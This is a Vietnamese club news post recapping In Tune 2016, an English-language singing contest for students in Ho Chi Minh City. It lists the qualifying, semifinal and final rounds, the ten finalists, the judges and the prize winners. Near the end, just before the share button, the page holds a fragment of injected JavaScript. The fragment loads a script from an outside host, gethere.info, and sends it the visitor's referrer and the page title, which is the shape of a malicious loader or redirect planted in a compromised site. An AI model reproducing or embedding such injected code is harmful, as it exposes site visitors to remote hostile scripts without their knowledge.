[BEE] – INTUNE 2016 – Khoảnh khắc nhìn lại

0
1600

In Tune là cuộc thi hát tiếng Anh do Hội sinh viên trường ĐH Khoa học tự nhiên và câu lạc bộ Anh văn BEE Club tổ chức nhằm tạo ra một sân chơi giao lưu bổ ích cho sinh viên yêu thích hát tiếng Anh trên toàn TP. Hồ Chí Minh. Năm 2016 cũng là năm đầu tiên cuộc thi được tổ chức, với sự tài trợ của Trường dạy nói tiếng Anh SpeakOnly.

Kể từ khi chính thức được công bố, In Tune 2016 đã thu hút được sự chú ý của sinh viên từ nhiều trường trên địa bàn thành phố, với hàng trăm lượt đăng ký online và trực tiếp. Vòng loại của In Tune 2016 được diễn ra vào ngày 06/03/2016 tại phòng I23 trường ĐH Khoa học tự nhiên cơ sở Nguyễn Văn Cừ, với hơn 100 thí sinh tham gia dự thi. Tại vòng loại, các thí sinh sẽ thể hiện một tiết mục tự chọn. Sau vòng loại, Ban giám khảo đã chọn ra 22 thí sinh xuất sắc nhất để tiến vào vòng Bán kết.

Picture1Picture2

Vòng Bán kết của In Tune 2016 được diễn ra vào ngày 13/03/2016 tại Giảng đường 1 trường ĐH Khoa học tự nhiên với hình thức mới lạ: mỗi thí sinh sẽ có 2 phần thi hát đôi với bài hát tự chọn và hát nhóm với nhóm từ 3 đến 4 thành viên với bài hát được Ban tổ chức chỉ định. Việc chia nhóm được công bố trước đó một tuần để các thí sinh có thể liên hệ với nhau tập luyện chuẩn bị cho phần trình diễn bán kết.

Picture3

Ngay trong buổi thi chung kết, Ban tổ chức đã tổng hợp điểm để công bố danh sách 10 thí sinh lọt vào vòng Chung kết gồm:

  1. Trần Mạnh Cường
  2. Nguyễn Thanh Huy Hoàng
  3. Quảng Bội Kha
  4. Đỗ Hữu Khang
  5. Nguyễn Thị Ngọc Linh
  6. Nguyễn Thị Sao Mai
  7. Lưu Thị Kim Ngân
  8. Đỗ Hồng Ngọc
  9. Phạm Ngọc Diễm Nhi
  10. Trịnh Thị Diệu Thùy

Picture4

Vòng Chung kết In Tune 2016 diễn ra vào ngày 20/03/2016 tại Giàng đường 1 trường ĐH Khoa học tự nhiên được xem là một trong những sự kiện lớn nhất mà BEE Club từng tổ chức, với sự tham gia theo dõi của đại diện Hội sinh viên trường ĐH Khoa học tự nhiên, các cơ sở hội trong trường, đại diện các câu lạc bộ từ các trường ngoài có hợp tác với BEE Club, đại diện nhà tài trợ, các thí sinh đã tham gia các vòng trước của In Tune 2016 cùng với hơn 100 bạn khán giả trong và ngoài trường. Tại vòng Chung kết, mỗi thí sinh sẽ có một phần thi hát đơn và một phần thi hát nhóm với nhóm được bốc thăm ngẫu nhiên. 10 thí sinh với đa dạng phong cách đã đem đến cho khán giả một buổi trình diễn đầy màu sắc và rất hấp dẫn.

Picture5

Picture6

Picture8

In Tune 2016 cũng được đánh giá rất cao về mặt chuyên môn. Cả 10 thí sinh trong vòng Chung kết đều có giọng hát và khả năng trình diễn trên sân khấu rất tốt. Ban giám khảo của In Tune 2016 cũng là những cái tên chất lượng: anh Đậu Văn Ngọc (cựu thành viên đội Văn nghệ xung kích), anh Nguyễn Thái Dương (cựu thành viên đội Văn nghệ xung kích, nhà sáng lập trung tâm SpeakOnly), chị Lý Hoàng Kim (nghệ sĩ Nhà hát giao hưởng TP.HCM, giảng viên thanh nhạc tại Nhạc viện TP.HCM).

Picture9

Cũng trong đêm Chung kết In Tune 2016, BEE Club đã tổ chức buổi lễ kỷ niệm 10 năm thành lập với sự góp mặt của rất nhiều anh chị cựu thành viên đã theo sát và hỗ trợ cho BEE Club từ lúc mới thành lập.

Picture10

Kết quả chung cuộc của In Tune 2016:

– Giải Nhất: Nguyễn Thị Ngọc Linh – trường ĐH Ngoại thương CS2.

– Giải Nhì: Quảng Bội Kha – trường ĐH Khoa học Xã hội & Nhân văn TP.HCM.

– Giải Ba và giải Thí sinh được yêu thích nhất: Lưu Thị Kim Ngân – trường ĐH Ngân hàng TP.HCM.

Picture11

Picture12

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

CHIA SẺ